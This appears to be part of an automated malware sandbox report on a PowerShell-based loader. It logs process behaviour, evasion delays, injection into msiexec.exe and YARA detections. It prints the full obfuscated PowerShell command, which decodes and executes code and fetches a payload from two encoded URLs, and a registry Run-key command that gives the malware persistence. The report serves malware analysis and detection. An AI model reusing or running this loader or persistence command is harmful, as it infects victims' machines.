              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5362Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4554Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7566Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2252Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5528Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6584Thread sleep count: 3326 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6256Thread sleep count: 538 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6256Thread sleep time: -1614000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6256Thread sleep count: 5258 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6256Thread sleep time: -15774000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3326 delay: -5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(Jy+
              Source: msiexec.exe, 0000000A.00000002.3800682702.00000000083E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3800682702.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1530009082.0000026CB6874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_6232.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $reconjoin;function yngve($sagan){ .($miljforandringen) ($sagan)} function freeloaded($knyttelversenes){$unsuppleness=5;do{$nonordered+=$knyttelversenes[$unsuppleness];$unsuppleness+=6;$gaardmand=format-list} until(!$knyttelversenes[$unsuppleness])$nonordered}$stokerfyrene9=freeloaded ' gaden s ejemangat anhy.retniw';$stokerfyrene9+=freeloaded 'lithse nalybfa erc u milprec.irailre slgtnvid rt';$udtalendes=freeloaded 'commumspurro,vulrz in.ticoccilbir.mltre easte,n/';$unsupplenesschthyologic=freeloaded 'virtuttermoldebats humu1tusin2';$soejlevis='green[gratincentrem niathegem. ud asgrisgeteaterafslav ce liclaywcflybyenectapdionyo panai aarenf,reftin,ermdrgnialuftfn fednaberedgrapnie doverbreds]helli:smoko: portsrestre he lcp.rmuutalefr arriibalbutgastrysm.lkppusssrslaveotyptot sy co ffabcbouiloplejelb,jle= soli$skuesu ss entoymas fteuga.lopcystep ui.eltonsiejejunn systecontrsaristso dencstyk hh ortt ove h entyparalotr efl veg obargaghorteis ngnc';$udtalendes+=freeloaded ' ski 5ov rk.jensp0eastr inebr( rev w.elefipantengipsudlemaro neurwapotesmanas attr nzamortgamle te.ns1sputn0cuiss. ti.s0fines;torsk cadmiwfrakoivul,angaase6kreat4,lkef; stic uninsx slag6,awmo4p two;fort unchrchefsvcivil:d,ndr1uneat3 ykke4coshe.fotog0.itel)kr ig udpogtranses aftcmuslikaortooretab/trach2 prin0skumm1afrik0rhamn0outsp1 cadm0s ill1be gg knittfurtepi avisrefterenarref k onoinditx s tr/no,su1rdbed3 besk4 bist.bukse0';$absurdistisk=freeloaded ' kom,upetu,sgearkepulver kell-gendeaforkog inusepseudnsphert';$gigtfebers=freeloaded 'e bothhavmit .wizt inegpreallsmniac:baa.m/chi.k/eng lptapsae forhniterodfr,tieafsp l purdirespivadopteindklr podoysk alh nat linde . har cmisalod,modmvog.m/brugems ttiubidsar c mpkalkyde anc rov,rc. sejllmtrikptank k spic> natuh bl.et f lctmhla,pundersa gaa:udvik/deute/skol.pmagteeskibsn im rd.ophieantisld iryipa advnonreeblaakrpatriy rou,h revoltrskoxsubtrp medd.uddifc dyksoudslum hrme/wolflmrekinugrororyndlikt lusesleskr nder.hektol grnspstridk';$delggelsesdrifters=freeloaded 'overd>';$miljforandringen=freeloaded 'grubligranie by.ax';$adulterers='sammenbundne';$unincriminated='\regnskabsinformationernes.arm';yngve (freeloaded 'kontr$forfagpraeclsemipo ekstbwadinahjertlclu r:t ailted torglansod.gteuk epessaccaelebisr cavae heget la atmor genedrysautop= toug$oxygaehistona sisvscore:jutehapluripclimapprecodpenn ahjemmtto lia disj+skelg$sonoru contnunsi iu iranautencstnder ,eakikloremlateri antinudtrkak mmut,uldte v,std');yngve (freeloaded 'probl$periogeksemldi.agopostnbsalamaendo lperfe:jujubhsuilie lresta lltperso=glded$ sup.gpr seiobsergvisnitindisfu,dlaepig ibassocetidsurbesids .rim.inaptstryk previsl domfihelditsur,n(ant.t$slt ed busiefunktlsymphgtriolghybriedolenl goanssc ooeruti sbranddholodrcom aimultifoppostpat.neindt,rko ifsordre)');yngve (freeloaded $soejlevis);$gigtfebers=$hest[0];$mervrdiafgift=(freeloaded 'who t$ uncognedd lpincuobl
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $reconjoin;function yngve($sagan){ .($miljforandringen) ($sagan)} function freeloaded($knyttelversenes){$unsuppleness=5;do{$nonordered+=$knyttelversenes[$unsuppleness];$unsuppleness+=6;$gaardmand=format-list} until(!$knyttelversenes[$unsuppleness])$nonordered}$stokerfyrene9=freeloaded ' gaden s ejemangat anhy.retniw';$stokerfyrene9+=freeloaded 'lithse nalybfa erc u milprec.irailre slgtnvid rt';$udtalendes=freeloaded 'commumspurro,vulrz in.ticoccilbir.mltre easte,n/';$unsupplenesschthyologic=freeloaded 'virtuttermoldebats humu1tusin2';$soejlevis='green[gratincentrem niathegem. ud asgrisgeteaterafslav ce liclaywcflybyenectapdionyo panai aarenf,reftin,ermdrgnialuftfn fednaberedgrapnie doverbreds]helli:smoko: portsrestre he lcp.rmuutalefr arriibalbutgastrysm.lkppusssrslaveotyptot sy co ffabcbouiloplejelb,jle= soli$skuesu ss entoymas fteuga.lopcystep ui.eltonsiejejunn systecontrsaristso dencstyk hh ortt ove h entyparalotr efl veg obargaghorteis ngnc';$udtalendes+=freeloaded ' ski 5ov rk.jensp0eastr inebr( rev w.elefipantengipsudlemaro neurwapotesmanas attr nzamortgamle te.ns1sputn0cuiss. ti.s0fines;torsk cadmiwfrakoivul,angaase6kreat4,lkef; stic uninsx slag6,awmo4p two;fort unchrchefsvcivil:d,ndr1uneat3 ykke4coshe.fotog0.itel)kr ig udpogtranses aftcmuslikaortooretab/trach2 prin0skumm1afrik0rhamn0outsp1 cadm0s ill1be gg knittfurtepi avisrefterenarref k onoinditx s tr/no,su1rdbed3 besk4 bist.bukse0';$absurdistisk=freeloaded ' kom,upetu,sgearkepulver kell-gendeaforkog inusepseudnsphert';$gigtfebers=freeloaded 'e bothhavmit .wizt inegpreallsmniac:baa.m/chi.k/eng lptapsae forhniterodfr,tieafsp l purdirespivadopteindklr podoysk alh nat linde . har cmisalod,modmvog.m/brugems ttiubidsar c mpkalkyde anc rov,rc. sejllmtrikptank k spic> natuh bl.et f lctmhla,pundersa gaa:udvik/deute/skol.pmagteeskibsn im rd.ophieantisld iryipa advnonreeblaakrpatriy rou,h revoltrskoxsubtrp medd.uddifc dyksoudslum hrme/wolflmrekinugrororyndlikt lusesleskr nder.hektol grnspstridk';$delggelsesdrifters=freeloaded 'overd>';$miljforandringen=freeloaded 'grubligranie by.ax';$adulterers='sammenbundne';$unincriminated='\regnskabsinformationernes.arm';yngve (freeloaded 'kontr$forfagpraeclsemipo ekstbwadinahjertlclu r:t ailted torglansod.gteuk epessaccaelebisr cavae heget la atmor genedrysautop= toug$oxygaehistona sisvscore:jutehapluripclimapprecodpenn ahjemmtto lia disj+skelg$sonoru contnunsi iu iranautencstnder ,eakikloremlateri antinudtrkak mmut,uldte v,std');yngve (freeloaded 'probl$periogeksemldi.agopostnbsalamaendo lperfe:jujubhsuilie lresta lltperso=glded$ sup.gpr seiobsergvisnitindisfu,dlaepig ibassocetidsurbesids .rim.inaptstryk previsl domfihelditsur,n(ant.t$slt ed busiefunktlsymphgtriolghybriedolenl goanssc ooeruti sbranddholodrcom aimultifoppostpat.neindt,rko ifsordre)');yngve (freeloaded $soejlevis);$gigtfebers=$hest[0];$mervrdiafgift=(freeloaded 'wh
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "startup key" /t reg_expand_sz /d "%stalemated% -windowstyle 1 $taknemmeligste=(gi 'hkcu:\software\lnoverfrslerne\').getvalue('newsmagazines');%stalemated% ($taknemmeligste)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $reconjoin;function yngve($sagan){ .($miljforandringen) ($sagan)} function freeloaded($knyttelversenes){$unsuppleness=5;do{$nonordered+=$knyttelversenes[$unsuppleness];$unsuppleness+=6;$gaardmand=format-list} until(!$knyttelversenes[$unsuppleness])$nonordered}$stokerfyrene9=freeloaded ' gaden s ejemangat anhy.retniw';$stokerfyrene9+=freeloaded 'lithse nalybfa erc u milprec.irailre slgtnvid rt';$udtalendes=freeloaded 'commumspurro,vulrz in.ticoccilbir.mltre easte,n/';$unsupplenesschthyologic=freeloaded 'virtuttermoldebats humu1tusin2';$soejlevis='green[gratincentrem niathegem. ud asgrisgeteaterafslav ce liclaywcflybyenectapdionyo panai aarenf,reftin,ermdrgnialuftfn fednaberedgrapnie doverbreds]helli:smoko: portsrestre he lcp.rmuutalefr arriibalbutgastrysm.lkppusssrslaveotyptot sy co ffabcbouiloplejelb,jle= soli$skuesu ss entoymas fteuga.lopcystep ui.eltonsiejejunn systecontrsaristso dencstyk hh ortt ove h entyparalotr efl veg obargaghorteis ngnc';$udtalendes+=freeloaded ' ski 5ov rk.jensp0eastr inebr( rev w.elefipantengipsudlemaro neurwapotesmanas attr nzamortgamle te.ns1sputn0cuiss. ti.s0fines;torsk cadmiwfrakoivul,angaase6kreat4,lkef; stic uninsx slag6,awmo4p two;fort unchrchefsvcivil:d,ndr1uneat3 ykke4coshe.fotog0.itel)kr ig udpogtranses aftcmuslikaortooretab/trach2 prin0skumm1afrik0rhamn0outsp1 cadm0s ill1be gg knittfurtepi avisrefterenarref k onoinditx s tr/no,su1rdbed3 besk4 bist.bukse0';$absurdistisk=freeloaded ' kom,upetu,sgearkepulver kell-gendeaforkog inusepseudnsphert';$gigtfebers=freeloaded 'e bothhavmit .wizt inegpreallsmniac:baa.m/chi.k/eng lptapsae forhniterodfr,tieafsp l purdirespivadopteindklr podoysk alh nat linde . har cmisalod,modmvog.m/brugems ttiubidsar c mpkalkyde anc rov,rc. sejllmtrikptank k spic> natuh bl.et f lctmhla,pundersa gaa:udvik/deute/skol.pmagteeskibsn im rd.ophieantisld iryipa advnonreeblaakrpatriy rou,h revoltrskoxsubtrp medd.uddifc dyksoudslum hrme/wolflmrekinugrororyndlikt lusesleskr nder.hektol grnspstridk';$delggelsesdrifters=freeloaded 'overd>';$miljforandringen=freeloaded 'grubligranie by.ax';$adulterers='sammenbundne';$unincriminated='\regnskabsinformationernes.arm';yngve (freeloaded 'kontr$forfagpraeclsemipo ekstbwadinahjertlclu r:t ailted torglansod.gteuk epessaccaelebisr cavae heget la atmor genedrysautop= toug$oxygaehistona sisvscore:jutehapluripclimapprecodpenn ahjemmtto lia disj+skelg$sonoru contnunsi iu iranautencstnder ,eakikloremlateri antinudtrkak mmut,uldte v,std');yngve (freeloaded 'probl$periogeksemldi.agopostnbsalamaendo lperfe:jujubhsuilie lresta lltperso=glded$ sup.gpr seiobsergvisnitindisfu,dlaepig ibassocetidsurbesids .rim.inaptstryk previsl domfihelditsur,n(ant.t$slt ed busiefunktlsymphgtriolghybriedolenl goanssc ooeruti sbranddholodrcom aimultifoppostpat.neindt,rko ifsordre)');yngve (freeloaded $soejlevis);$gigtfebers=$hest[0];$mervrdiafgift=(freeloaded 'who t$ uncognedd lpincuoblJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "startup key" /t reg_expand_sz /d "%stalemated% -windowstyle 1 $taknemmeligste=(gi 'hkcu:\software\lnoverfrslerne\').getvalue('newsmagazines');%stalemated% ($taknemmeligste)"Jump to behavior
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2025/03/07 12:41:53 Program Manager]
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerc
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3800682702.0000000008420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerA
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managern
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7
